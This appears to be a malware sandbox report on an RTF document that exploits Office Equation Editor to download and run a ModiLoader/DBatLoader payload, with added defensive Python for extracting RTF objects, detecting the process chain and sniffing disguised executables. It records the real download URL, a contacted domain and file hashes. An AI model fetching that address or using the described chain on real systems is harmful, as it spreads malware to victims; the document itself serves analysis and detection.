Analysis
-
max time kernel: 140s
max time network: 124s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 26/09/2024, 11:04 UTC
-
Static task: static1
-
Behavioral task: behavioral1
  Sample: 9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
  Resource: win7-20240704-en
-
Behavioral task: behavioral2
  Sample: 9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
  Resource: win10v2004-20240802-en
General
-
Target: 9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf
Size: 101KB
MD5: 7a9a05109dd848058fd327bc38459a3d
SHA1: a086488bd204ca42e9d522b769b94c9467ad5520
SHA256: 9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2
SHA512: 8dde56f67785f7594f1e4fe2a3b05519333daa980bae0fd84ffa34671d1d1f7507af6d04dba4909d3195db536ae2fd2782a6f45f5eb7f0df5015ca4b88e0925d
SSDEEP: 768:mbTYjIXuCGvGvJSuv0AwTaTSvq1e397u1X:mojyValnaev+eNK
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader (also tracked as DBatLoader) is a Delphi-written loader that abuses cloud services to download other malicious families.
-
ModiLoader Second Stage 60 IoCs
resource                                                                      yara_rule
All 60 hits are memory snapshots of PID 2560 (audiodg.exe) of the same 16 MiB region, 0x031E0000-0x041E0000:
behavioral1/memory/2560-<n>-0x00000000031E0000-0x00000000041E0000-memory.dmp   modiloader_stage2
  where n = 20 and 25-84 (snapshot 73 absent), 60 snapshots in total
Blocklisted process makes network request 1 IoCs
flow  pid   Process
3     2892  EQNEDT32.EXE
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid   Process
2560  audiodg.exe
-
Loads dropped DLL 5 IoCs
pid   Process
2892  EQNEDT32.EXE
2892  EQNEDT32.EXE
1840  WerFault.exe
1840  WerFault.exe
1840  WerFault.exe
-
Drops file in Windows directory 1 IoCs
description                   ioc                                 Process
File opened for modification  C:\Windows\Debug\WIA\wiatrace.log   WINWORD.EXE
-
Program crash 1 IoCs
pid   pid_target  Process       procid_target
1840  2560        WerFault.exe  33
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.
description  ioc                                                          Process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  audiodg.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor (EQNEDT32.EXE) is a legacy Office component often targeted by exploits such as CVE-2017-11882.
pid   Process
2892  EQNEDT32.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid   Process
2900  WINWORD.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
pid   Process
2900  WINWORD.EXE
2900  WINWORD.EXE
-
Suspicious use of WriteProcessMemory 12 IoCs
description                       pid   Process       procid_target
PID 2892 wrote to memory of 2560  2892  EQNEDT32.EXE  33   (4 identical events)
PID 2900 wrote to memory of 1112  2900  WINWORD.EXE   35   (4 identical events)
PID 2560 wrote to memory of 1840  2560  audiodg.exe   36   (4 identical events)
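The "Launches Equation Editor" and "Office loads VBA resources, possible macro or embedded object" signatures above are what the sandbox sees at run time; the static equivalent is to pull the embedded objects out of the RTF before detonation. The following is an added example, not the sandbox's signature code and not a tool from the report: a minimal Python extractor that walks each \objdata group (tracking brace depth and skipping control words), pairs it with the preceding \objclass, hex-decodes the payload and checks for the OLE compound-file magic. The RTF it runs on is constructed here to look like an Equation.3 carrier; it is not the 101 KB sample analysed on this page, whose contents the report does not show. For real triage use oletools' rtfobj, which handles the obfuscation tricks this sketch ignores (\bin runs, split control words, junk between hex digits).

```python
import re

# Constructed RTF document (not the sample analysed on this page), shaped like an
# Equation Editor exploit carrier: an \object group whose \objclass is Equation.3
# and whose \objdata is a hex-encoded OLE compound file. The embedded "OLE file"
# is only the 8-byte magic plus zero filler, enough to exercise the checks below.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
SAMPLE_RTF = (
    r"{\rtf1\ansi\deff0{\fonttbl{\f0 Times New Roman;}}"
    r"\pard Invoice attached.\par"
    r"{\object\objemb\objw1\objh1{\*\objclass Equation.3}"
    r"{\*\objdata " + (OLE_MAGIC + b"\x00" * 24).hex() + r"}}"
    r"\par}"
)


def _objdata_body(rtf: str, start: int) -> str:
    r"""Return the raw text of the \objdata group that begins at `start` (just after
    the control word). Control words and control symbols are skipped, and brace
    depth is tracked so nested groups inside the payload do not end it early."""
    depth, i, out = 0, start, []
    while i < len(rtf):
        c = rtf[i]
        if c == "\\":                       # control word (\bin12) or control symbol (\{ \' \\)
            i += 1
            if i < len(rtf) and rtf[i].isalpha():
                while i < len(rtf) and rtf[i].isalpha():
                    i += 1
                while i < len(rtf) and (rtf[i].isdigit() or rtf[i] == "-"):
                    i += 1
            else:
                i += 1
            continue
        if c == "{":
            depth += 1
        elif c == "}":
            if depth == 0:                  # closing brace of the \objdata group itself
                break
            depth -= 1
        else:
            out.append(c)
        i += 1
    return "".join(out)


def extract_objects(rtf: str) -> list[dict]:
    r"""Find every \objdata payload, pair it with the nearest preceding \objclass,
    hex-decode it and report whether it is an OLE compound file."""
    objects = []
    for m in re.finditer(r"\\objdata\b", rtf):
        classes = re.findall(r"\\objclass\s*([^\\{}]+)", rtf[: m.start()])
        hexdata = "".join(ch for ch in _objdata_body(rtf, m.end())
                          if ch in "0123456789abcdefABCDEF")
        blob = bytes.fromhex(hexdata[: len(hexdata) & ~1])   # drop a trailing odd nibble
        objects.append({
            "objclass": classes[-1].strip() if classes else None,
            "size": len(blob),
            "is_ole": blob.startswith(OLE_MAGIC),
            "magic": blob[:8].hex(),
        })
    return objects


def equation_objects(rtf: str) -> list[str]:
    """Classes of embedded objects that Word would hand to EQNEDT32.EXE on open."""
    return [o["objclass"] for o in extract_objects(rtf)
            if o["objclass"] and "equation" in o["objclass"].lower()]


if __name__ == "__main__":
    for o in extract_objects(SAMPLE_RTF):
        print(o)
    print("Equation Editor objects:", equation_objects(SAMPLE_RTF))
```

Any Equation.* object in a document received by mail is worth quarantining on its own: Equation Editor was removed from Office in January 2018 and a legitimate document has little reason to carry one.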
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE   PID:2900
  command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9f00a5fc9bdc5206d34d60f39e9872df590b4b71685afb0996e2d46e2b5a97d2.rtf"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
    C:\Windows\splwow64.exe   PID:1112
      command line: C:\Windows\splwow64.exe 12288
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE   PID:2892
  command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\audiodg.exe   PID:2560
      command line: "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\WerFault.exe   PID:1840
          command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2560 -s 716
          - Loads dropped DLL
          - Program crash
-
Note that EQNEDT32.EXE sits at the top level rather than under WINWORD.EXE: the -Embedding switch shows it was started by COM activation when Word rendered the embedded Equation object, so its parent is the DCOM launcher, not Word. Detection rules keyed on WINWORD.EXE as the parent of the payload miss this chain; the useful parent is EQNEDT32.EXE itself, which here fetched and started the dropped audiodg.exe (PID 2560) from %AppData%\Roaming, a path the real audiodg.exe (a System32 binary) never runs from. The WerFault.exe child records that the dropped payload crashed in the sandbox.
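The process tree above is the pattern a host-based rule should key on: Equation Editor creating a child process, Equation Editor opening a network connection, and a payload running under a system-binary name from a user-writable directory. The block below is an added example of that detection logic, written for this page and not taken from the sandbox or any vendor product. It runs over a small set of constructed process and network events modelled on the tree (PIDs, image paths and the download address are copied from the report; parents that the report does not record are set to None), and the list of system-binary names is an assumption to be extended per environment.

```python
import ntpath

# Constructed process-creation and network events modelled on the process tree in
# this report. PIDs, images and the download address are taken from the report;
# the parents of WINWORD.EXE and EQNEDT32.EXE are not recorded there, so they are
# None. These are not real sensor logs.
EVENTS = [
    {"type": "process", "pid": 2900, "ppid": None,
     "image": r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"},
    {"type": "process", "pid": 1112, "ppid": 2900, "image": r"C:\Windows\splwow64.exe"},
    # EQNEDT32.EXE is COM-activated (-Embedding), so it is not a child of WINWORD.EXE
    {"type": "process", "pid": 2892, "ppid": None,
     "image": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"},
    {"type": "network", "pid": 2892, "dst": "107.175.243.142", "dport": 80},
    {"type": "process", "pid": 2560, "ppid": 2892,
     "image": r"C:\Users\Admin\AppData\Roaming\audiodg.exe"},
    {"type": "process", "pid": 1840, "ppid": 2560, "image": r"C:\Windows\SysWOW64\WerFault.exe"},
]

# Names of legitimate Windows binaries that droppers like to borrow; the genuine
# copies live under C:\Windows. Assumed starter list, extend per environment.
SYSTEM_BINARY_NAMES = {"audiodg.exe", "svchost.exe", "explorer.exe",
                       "werfault.exe", "splwow64.exe"}


def _name(image: str) -> str:
    # ntpath parses Windows paths correctly even when this runs on Linux
    return ntpath.basename(image).lower()


def detect(events: list[dict]) -> list[dict]:
    """Apply three rules to a batch of events and return one alert per match."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    alerts = []
    for e in events:
        if e["type"] == "process":
            parent = procs.get(e["ppid"])
            # Rule 1: Equation Editor has no reason to spawn anything; a child after a
            # document open is the CVE-2017-11882 exploitation pattern.
            if parent is not None and _name(parent["image"]) == "eqnedt32.exe":
                alerts.append({"rule": "eqnedt32_spawns_child", "pid": e["ppid"],
                               "child": e["pid"], "image": e["image"]})
            # Rule 2: a system-binary name executing from outside C:\Windows
            # (here audiodg.exe under %AppData%\Roaming) is a masquerading payload.
            if (_name(e["image"]) in SYSTEM_BINARY_NAMES
                    and not e["image"].lower().startswith("c:\\windows\\")):
                alerts.append({"rule": "system_binary_name_outside_windows",
                               "pid": e["pid"], "image": e["image"]})
        elif e["type"] == "network":
            # Rule 3: Equation Editor never needs the network.
            p = procs.get(e["pid"])
            if p is not None and _name(p["image"]) == "eqnedt32.exe":
                alerts.append({"rule": "eqnedt32_network", "pid": e["pid"],
                               "dst": f'{e["dst"]}:{e["dport"]}'})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Rule 1 fires on PID 2560 being created by 2892, rule 3 on 2892 contacting 107.175.243.142:80, and rule 2 on the AppData audiodg.exe; the WINWORD.EXE to splwow64.exe pair (a normal print-spooler helper) and the WerFault.exe crash handler produce nothing. On a real sensor the same rules map directly onto Sysmon event IDs 1 (process create) and 3 (network connect).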
Network
-
Remote address: 107.175.243.142:80
Request:
GET /340/audiodg.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 107.175.243.142
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Wed, 25 Sep 2024 00:08:41 GMT
ETag: "109c00-622e66ca7c781"
Accept-Ranges: bytes
Content-Length: 1088512
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/lnk
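The response above labels a 1,088,512-byte body as application/lnk, yet the sandbox raised "Downloads MZ/PE file", because that verdict comes from the bytes, not the header. Proxies and mail gateways that trust Content-Type miss exactly this. The following is an added example written for this page (not sandbox code): it sniffs a download for a well-formed MZ/PE header, reads the machine type and PE32/PE32+ magic, and flags the case where a PE arrives under a non-executable Content-Type. The response headers are those captured above; the body is a constructed minimal PE header, since the real audiodg.exe is not reproduced on this page.

```python
import struct

# IMAGE_FILE_HEADER.Machine values (subset)
MACHINES = {0x014C: "i386", 0x8664: "amd64", 0x01C4: "armnt", 0xAA64: "arm64"}
# Content-Types under which a server may legitimately serve a Windows executable
EXECUTABLE_TYPES = {"application/x-msdownload", "application/octet-stream",
                    "application/vnd.microsoft.portable-executable",
                    "application/x-dosexec", "application/exe", "application/x-exe"}


def build_fake_pe(machine=0x014C, opt_magic=0x10B) -> bytes:
    """Constructed minimal PE header for the demo: a DOS header whose e_lfanew points
    at the PE signature, a COFF header declaring one section, and the optional-header
    magic. Not a loadable binary, just enough bytes to be sniffed as MZ/PE."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # e_lfanew -> PE signature
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + coff + struct.pack("<H", opt_magic) + b"\0" * 0xDE


def sniff_pe(body: bytes):
    """Return header facts if `body` starts with a well-formed MZ/PE header, else None."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", body, 0x3C)[0]
    # need the 4-byte signature, 20-byte COFF header and 2-byte optional magic
    if e_lfanew + 26 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, n_sections = struct.unpack_from("<HH", body, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", body, e_lfanew + 24)[0]
    return {"machine": MACHINES.get(machine, hex(machine)),
            "sections": n_sections,
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(opt_magic, hex(opt_magic))}


def classify_download(headers: dict, body: bytes) -> dict:
    """Compare what the server declared with what the bytes actually are."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    pe = sniff_pe(body)
    return {"declared": declared, "pe": pe, "is_pe": pe is not None,
            "content_type_mismatch": pe is not None and declared not in EXECUTABLE_TYPES}


# Response headers as captured in this report; the body handed to the classifier
# is the constructed header above, not the real 1,088,512-byte audiodg.exe.
CAPTURED_HEADERS = {"Server": "Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12",
                    "Content-Length": "1088512",
                    "Content-Type": "application/lnk"}

if __name__ == "__main__":
    print(classify_download(CAPTURED_HEADERS, build_fake_pe()))
```

Two further observations from the capture itself: the User-Agent is the WinINet default string rather than a browser's, consistent with the "Blocklisted process makes network request" hit attributing the GET to EQNEDT32.EXE, and the WOW64 token shows the 32-bit Equation Editor issuing it on the x64 image.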
-
Remote address: 8.8.8.8:53
Request: maan2u.com IN A
Response: maan2u.com IN A 112.137.173.77
-
Flow 107.175.243.142:80   23.1kB 1.2MB 480 836
  HTTP Request: GET http://107.175.243.142/340/audiodg.exe
  HTTP Response: 200
-
Flow   190 B 132 B 4 3
-
Flow   390 B 650 B 6 5
-
Flow   334 B 650 B 6 5
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize: 19KB
MD5: e0ddab4d3057a6120f77ac3873a0667e
SHA1: 264afe13a44196ab1c35a83d9736ca2140e6015f
SHA256: ceedcb97af3bc5cdba7560964ee665321877858bf979beeb94366df6c2dd34ac
SHA512: 6372af6138956303155d3e52003b1d17943dd574db5ccb0eb2ddea5d12c889630981b363f89718290c4ae28c1981ac2f452ab77026d65c2f2c54f069b75bc8de
-
Filesize: 1.0MB
MD5: bbf710c83246092a538128620853d4fd
SHA1: 95338f06c76178de31b5e8453f92c43f970ea9f9
SHA256: 7ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
SHA512: a609d92fe0d25e7db140c731af4b241d47cdaddfe735d9f7575c982ef790ab01d7f969038546e6054101b745e8c208f74e41faf246173ca0722c7b994cf94001